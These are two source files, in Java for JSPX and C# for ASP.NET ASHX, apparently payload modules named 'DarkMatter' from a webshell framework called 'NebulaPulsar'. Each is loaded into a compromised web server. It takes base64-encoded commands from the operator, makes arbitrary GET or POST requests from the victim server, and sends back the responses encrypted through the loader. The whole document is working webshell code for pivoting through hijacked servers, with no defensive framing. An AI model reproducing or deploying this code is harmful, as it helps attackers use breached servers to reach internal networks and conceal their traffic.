File: Payload/JSPX/NebulaPulsar/DarkMatter/http.java
import java.io.ByteArrayOutputStream;
import java.io.InputStream;
import java.io.OutputStream;
import java.io.PrintWriter;
import java.io.StringWriter;
import java.lang.reflect.Method;
import java.net.HttpURLConnection;
import java.net.URL;
import java.nio.charset.StandardCharsets;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

public class http extends ClassLoader
{
    public http(ClassLoader objParent) { super(objParent); }
    public http() { super(http.class.getClassLoader()); }

    private Map<String, String> fnParseParams(String szParamStr)
    {
        Map<String, String> mapParams = new HashMap<String, String>();
        if (szParamStr == null || szParamStr.trim().isEmpty())
            return mapParams;

        String[] aszPairs = szParamStr.split("&");
        for (String szPair : aszPairs)
        {
            int nIdx = szPair.indexOf("=");
            if (nIdx > 0)
            {
                mapParams.put(szPair.substring(0, nIdx), szPair.substring(nIdx + 1));
            }
        }
        return mapParams;
    }

    private void fnWriteOutput(Object objParam, Object objResponse, OutputStream osClient, byte[] abResult)
    {
        if (abResult.length == 0)
            abResult = "DARKMATTER_SUCCESS: Action executed but returned no output".getBytes();

        Object objPageContext = objParam;

        try
        {
            byte[] abEncryptedResult = Encrypt(objParam, abResult);
            osClient.write(abEncryptedResult);
            osClient.flush();

            Method fnSetStatus = objResponse.getClass().getMethod("setStatus", new Class[]{int.class});
            fnSetStatus.invoke(objResponse, new Object[]{200});

            try
            {
                Method fnGetOut = objPageContext.getClass().getMethod("getOut", new Class[0]);
                Object objOut = fnGetOut.invoke(objPageContext, new Object[0]);
                Method fnClear = objOut.getClass().getMethod("clear", new Class[0]);
                fnClear.invoke(objOut, new Object[0]);
            }
            catch (Exception exIgnored) {}

            Method fnFlushBuffer = objResponse.getClass().getMethod("flushBuffer", new Class[0]);
            fnFlushBuffer.invoke(objResponse, new Object[0]);
        }
        catch (Exception exIgnored) {}
    }

    private byte[] Encrypt(Object objPageContext, byte[] abRawResponse)
    {
        try
        {
            if (objPageContext == null)
                return abRawResponse;

            Method fnGetRequest = objPageContext.getClass().getMethod("getRequest", new Class[0]);
            Object objRequest = fnGetRequest.invoke(objPageContext, new Object[0]);

            Method fnGetAttribute = objRequest.getClass().getMethod("getAttribute", new Class[]{String.class});
            Object objPulsarLoader = fnGetAttribute.invoke(objRequest, new Object[]{"pulsar_loader_instance"});
            
            if (objPulsarLoader == null)
                return abRawResponse;

            java.lang.reflect.Method fnCrypt = objPulsarLoader.getClass().getDeclaredMethod("Crypt", byte[].class, int.class);
            fnCrypt.setAccessible(true);

            return (byte[])fnCrypt.invoke(objPulsarLoader, abRawResponse, 1);
        }
        catch (Exception exCrashed)
        {
            return abRawResponse;
        }
    }

    @Override
    public boolean equals(Object objParam)
    {
        Object objPageContext = objParam;
        Object objRequest = null;
        Object objResponse = null;
        OutputStream osClient = null;

        try
        {
            Method fnGetRequest = objPageContext.getClass().getMethod("getRequest", new Class[0]);
            objRequest = fnGetRequest.invoke(objPageContext, new Object[0]);

            Method fnGetResponse = objPageContext.getClass().getMethod("getResponse", new Class[0]);
            objResponse = fnGetResponse.invoke(objPageContext, new Object[0]);

            Method fnGetOutputStream = objResponse.getClass().getMethod("getOutputStream", new Class[0]);
            osClient = (OutputStream) fnGetOutputStream.invoke(objResponse, new Object[0]);

            Method fnGetAttribute = objRequest.getClass().getMethod("getAttribute", new Class[]{String.class});
            Object objPayload = fnGetAttribute.invoke(objRequest, new Object[]{"payload"});
            Object objLength = fnGetAttribute.invoke(objRequest, new Object[]{"len"});

            if (objPayload == null || objLength == null)
            {
                osClient.write("PAYLOAD_ERROR: Missing attributes from request.".getBytes());
                return true;
            }

            byte[] abPayload = (byte[])objPayload;
            int nClassLength = Integer.parseInt(objLength.toString());
            int nParamOffset = nClassLength + 4;
            int nParamLength = abPayload.length - nParamOffset;
            String szParam = new String(abPayload, nParamOffset, nParamLength, "UTF-8").trim();

            Map<String, String> mapParams = fnParseParams(szParam);
            StringBuilder sb = new StringBuilder();

            String z0 = mapParams.get("z0");
            String szAction = (z0 != null) ? new String(Base64.getDecoder().decode(z0), StandardCharsets.UTF_8).trim() : "";

            String szStatus = "error";
            String szHttpCode = "null";
            String szDataResult = "";

            if (szAction.equalsIgnoreCase("get"))
            {
                String z1 = mapParams.get("z1");
                if (z1 == null)
                {
                    szDataResult = "Missing URL";
                }
                else
                {
                    String szURL = new String(Base64.getDecoder().decode(z1), StandardCharsets.UTF_8).trim();
                    String[] httpRes = fnExecuteHttp("GET", szURL, null);
                    szStatus = "ok";
                    szHttpCode = httpRes[0];
                    szDataResult = httpRes[1];
                }
            }
            else if (szAction.equalsIgnoreCase("post"))
            {
                String z1 = mapParams.get("z1");
                String z2 = mapParams.get("z2");

                if (z1 == null || z1.isEmpty())
                {
                    szDataResult = "Missing URL";
                }
                else
                {
                    String szURL = new String(Base64.getDecoder().decode(z1), StandardCharsets.UTF_8).trim();
                    String szPostData = (z2 != null) ? new String(Base64.getDecoder().decode(z2), StandardCharsets.UTF_8).trim() : "";
                    String[] httpRes = fnExecuteHttp("POST", szURL, szPostData);
                    szStatus = "ok";
                    szHttpCode = httpRes[0];
                    szDataResult = httpRes[1];
                }
            }
            else
            {
                szDataResult = "Invalid action";
            }

            sb.append("{\"status\":\"" + szStatus + "\"," + "\"action\":\"" + fnEscapeJson(szAction) + "\"," + "\"http_code\":" + szHttpCode + "," + "\"data\":\"" + fnEscapeJson(szDataResult) + "\"}");

            fnWriteOutput(objParam, objResponse, osClient, sb.toString().getBytes());
        }
        catch (Exception ex)
        {
            if (osClient != null)
            {
                try
                {
                    StringWriter swTrace = new StringWriter();
                    ex.printStackTrace(new PrintWriter(swTrace));
                    osClient.write(("DARKMATTER_INTERNAL_CRASHED: " + swTrace.toString()).getBytes());
                }
                catch (Exception exIgnored) 
                {
                    
                }
            }
        }

        return true;
    }

    private String fnEscapeJson(String str) {
        if (str == null) return "";
        return str.replace("\\", "\\\\")
                  .replace("\"", "\\\"")
                  .replace("\b", "\\b")
                  .replace("\f", "\\f")
                  .replace("\n", "\\n")
                  .replace("\r", "\\r")
                  .replace("\t", "\\t");
    }

    private String[] fnExecuteHttp(String szMethod, String szUrl, String szPostData)
    {
        String[] result = new String[]{"0", ""}; // [0] = HTTP Code, [1] = Body / Error Msg
        HttpURLConnection connection = null;
        InputStream is = null;
        ByteArrayOutputStream baos = null;

        try
        {
            URL url = new URL(szUrl);
            connection = (HttpURLConnection) url.openConnection();
            connection.setRequestMethod(szMethod.toUpperCase());
            connection.setConnectTimeout(15000);
            connection.setReadTimeout(15000);
            connection.setInstanceFollowRedirects(true);
            connection.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64)");

            if ("POST".equalsIgnoreCase(szMethod))
            {
                connection.setDoOutput(true);
                connection.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");
                if (szPostData != null)
                {
                    byte[] postBytes = szPostData.getBytes(StandardCharsets.UTF_8);
                    connection.setRequestProperty("Content-Length", String.valueOf(postBytes.length));
                    try (OutputStream os = connection.getOutputStream()) {
                        os.write(postBytes);
                    }
                }
            }

            int responseCode = connection.getResponseCode();
            result[0] = String.valueOf(responseCode);

            if (responseCode >= 200 && responseCode < 400)
            {
                is = connection.getInputStream();
            } 
            else
            {
                is = connection.getErrorStream();
            }

            if (is != null)
            {
                baos = new ByteArrayOutputStream();
                byte[] buffer = new byte[4096];
                int len;
                while ((len = is.read(buffer)) != -1)
                    baos.write(buffer, 0, len);

                result[1] = baos.toString("UTF-8");
            }

        }
        catch (Exception e)
        {
            if (result[0].equals("0"))
                result[0] = "500";

            result[1] = e.getMessage();

        }
        finally
        {
            if (baos != null)
                try { baos.close(); } catch (Exception e) {}
            if (is != null)
                try { is.close(); } catch (Exception e) {}
            if (connection != null)
                connection.disconnect();
        }

        return result;
    }
}

File: Payload/ASHX/NebulaPulsar/DarkMatter/http.cs
using System;
using System.Web;
using System.IO;
using System.Net;
using System.Text;
using System.Collections.Generic;
using System.Reflection;

public class http
{
    private Dictionary<string, string> fnParseParams(string szParam)
    {
        Dictionary<string, string> dic = new Dictionary<string, string>();
        if (string.IsNullOrEmpty(szParam))
            return dic;

        string[] pairs = szParam.Split('&');
        foreach (string szPair in pairs)
        {
            int nIdx = szPair.IndexOf("=");
            if (nIdx > 0)
                dic[szPair.Substring(0, nIdx).Trim()] = szPair.Substring(nIdx + 1).Trim();
        }

        return dic;
    }

    private string fnB64Encode(string szInput) => Convert.ToBase64String(Encoding.UTF8.GetBytes(szInput));
    private string fnB64Decode(string szInput) => Encoding.UTF8.GetString(Convert.FromBase64String(szInput));

    private void fnWriteOutput(object driver, HttpResponse response, byte[] abOutput)
    {
        var cryptMethod = driver.GetType().GetMethod("Crypt", new Type[] { typeof(byte[]), typeof(int) });
        byte[] abEncryptedResp = (byte[])cryptMethod.Invoke(driver, new object[] { abOutput, 1 });

        response.Clear();
        response.ContentType = "application/octet-stream";
        response.BinaryWrite(abEncryptedResp);
    }

    private string fnEscapeJson(string str)
    {
        if (string.IsNullOrEmpty(str)) return "";
        return str.Replace("\\", "\\\\")
                  .Replace("\"", "\\\"")
                  .Replace("\b", "\\b")
                  .Replace("\f", "\\f")
                  .Replace("\n", "\\n")
                  .Replace("\r", "\\r")
                  .Replace("\t", "\\t");
    }

    private string[] fnExecuteHttp(string szMethod, string szUrl, string szPostData)
    {
        string[] result = new string[] { "0", "" }; // [0] = HTTP Code, [1] = Body / Error Msg
        
        try
        {
            HttpWebRequest request = (HttpWebRequest)WebRequest.Create(szUrl);
            request.Method = szMethod.ToUpper();
            request.Timeout = 15000;
            request.ReadWriteTimeout = 15000;
            request.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)";
            request.KeepAlive = false;

            if ("POST".Equals(szMethod, StringComparison.OrdinalIgnoreCase))
            {
                request.ContentType = "application/x-www-form-urlencoded";
                if (szPostData != null)
                {
                    byte[] postBytes = Encoding.UTF8.GetBytes(szPostData);
                    request.ContentLength = postBytes.Length;
                    using (Stream os = request.GetRequestStream())
                    {
                        os.Write(postBytes, 0, postBytes.Length);
                    }
                }
                else
                {
                    request.ContentLength = 0;
                }
            }

            using (HttpWebResponse response = (HttpWebResponse)request.GetResponse())
            {
                result[0] = ((int)response.StatusCode).ToString();
                using (StreamReader reader = new StreamReader(response.GetResponseStream(), Encoding.UTF8))
                {
                    result[1] = reader.ReadToEnd();
                }
            }
        }
        catch (WebException wex)
        {
            if (wex.Response != null)
            {
                using (HttpWebResponse errorResponse = (HttpWebResponse)wex.Response)
                {
                    result[0] = ((int)errorResponse.StatusCode).ToString();
                    using (StreamReader reader = new StreamReader(errorResponse.GetResponseStream(), Encoding.UTF8))
                    {
                        result[1] = reader.ReadToEnd();
                    }
                }
            }
            else
            {
                result[0] = "500";
                result[1] = wex.Message;
            }
        }
        catch (Exception ex)
        {
            result[0] = "500";
            result[1] = ex.Message;
        }

        return result;
    }

    public bool Run()
    {
        HttpContext context = HttpContext.Current;
        if (context == null)
            return false;

        HttpRequest request = context.Request;
        HttpResponse response = context.Response;

        try
        {
            byte[] abPayload = (byte[])context.Items["payload"];
            object driver = context.Items["driver"];
            int nDllLength = (int)context.Items["len"];

            if (abPayload == null || driver == null)
            {
                response.Write("PAYLOAD_ERROR: Missing attributes from context.");
                return false;
            }

            int nParamOffset = nDllLength + 4;
            int nParamLength = abPayload.Length - nParamOffset;
            string szParam = Encoding.UTF8.GetString(abPayload, nParamOffset, nParamLength).Trim();

            Dictionary<string, string> dic = fnParseParams(szParam);

            string szAction = dic.ContainsKey("z0") ? fnB64Decode(dic["z0"]).Trim() : "";
            
            string szStatus = "error";
            string szHttpCode = "null";
            string szDataResult = "";

            if (szAction.Equals("get", StringComparison.OrdinalIgnoreCase))
            {
                if (!dic.ContainsKey("z1"))
                {
                    szDataResult = "Missing URL";
                }
                else
                {
                    string szURL = fnB64Decode(dic["z1"]).Trim();
                    string[] httpRes = fnExecuteHttp("GET", szURL, null);
                    szStatus = "ok";
                    szHttpCode = httpRes[0];
                    szDataResult = httpRes[1];
                }
            }
            else if (szAction.Equals("post", StringComparison.OrdinalIgnoreCase))
            {
                if (!dic.ContainsKey("z1"))
                {
                    szDataResult = "Missing URL";
                }
                else
                {
                    string szURL = fnB64Decode(dic["z1"]).Trim();
                    string szPostData = dic.ContainsKey("z2") ? fnB64Decode(dic["z2"]).Trim() : "";
                    string[] httpRes = fnExecuteHttp("POST", szURL, szPostData);
                    szStatus = "ok";
                    szHttpCode = httpRes[0];
                    szDataResult = httpRes[1];
                }
            }
            else
            {
                szDataResult = "Invalid action";
            }

            StringBuilder sb = new StringBuilder();
            sb.Append("{\"status\":\"" + szStatus + "\",")
              .Append("\"action\":\"" + fnEscapeJson(szAction) + "\",")
              .Append("\"http_code\":" + szHttpCode + ",")
              .Append("\"data\":\"" + fnEscapeJson(szDataResult) + "\"}");

            fnWriteOutput(driver, response, Encoding.UTF8.GetBytes(sb.ToString()));
        }
        catch (Exception ex)
        {
            response.Write("DARKMATTER_ERROR: " + ex.Message);
        }

        return true;
    }
}